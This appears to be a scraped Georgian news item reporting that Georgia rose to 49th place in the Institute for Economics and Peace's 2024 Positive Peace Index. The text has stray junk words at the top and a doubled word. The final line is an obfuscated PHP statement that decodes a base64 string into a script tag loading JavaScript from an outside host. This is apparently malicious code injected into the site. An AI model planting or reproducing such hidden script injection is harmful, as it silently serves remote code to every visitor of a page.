celsiusi
ავერსი შნაიდერი

 პოზიტიური მშვიდობის ინდექსით, საქართველო 50 საუკეთესო ქვეყანას შორის არის. შესაბამის ანგარიშს საერთაშორისო ანალიტიკური ცენტრი „ეკონომიკისა და მშვიდობის ინსტიტუტი“ (IEP) აქვეყნებს.

პოზიტიური მშვიდობის 2024 წლის ანგარიშის მიხედვით, წინა კვლევასთან შედარებით, საქართველომ საქართველომ პოზიცია ექვსი ადგილით გაიუმჯობესა, 49 ადგილზე გავიდა და პოზიტიური მშვიდობის მაღალი დონის სტატუსი დაიმკვიდრა.

პოზიტიური მშვიდობის ინდექსის დგება სოციალური ასპექტების კონსტრუქციულ ასპექტებზე დაყრდნობით. მისი შედგენისას გათვალისწინებულია შემდეგი ფაქტორები – მთავრობის კარგი ფუნქციონირება, კორუფციის დაბალი დონე, ჯანსაღი ბიზნეს გარემო, რესურსების სამართლიანი განაწილება, სხვათა უფლებების მიღება, ინფორმაციის თავისუფლება, ადამიანური კაპიტალის მაღალი დონე და მეზობელ ქვეყნებთან კარგი ურთიერთობები.

პოზიტიური მშვიდობის მსოფლიო რეიტინგში საქართველო ყველა მეზობელ ქვეყანას უსწრებს, პოსტსაბჭოთა ქვეყნებს შორის კი, მეოთხეა ბალტიისპირეთის ქვეყნების შემდეგ.

288
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");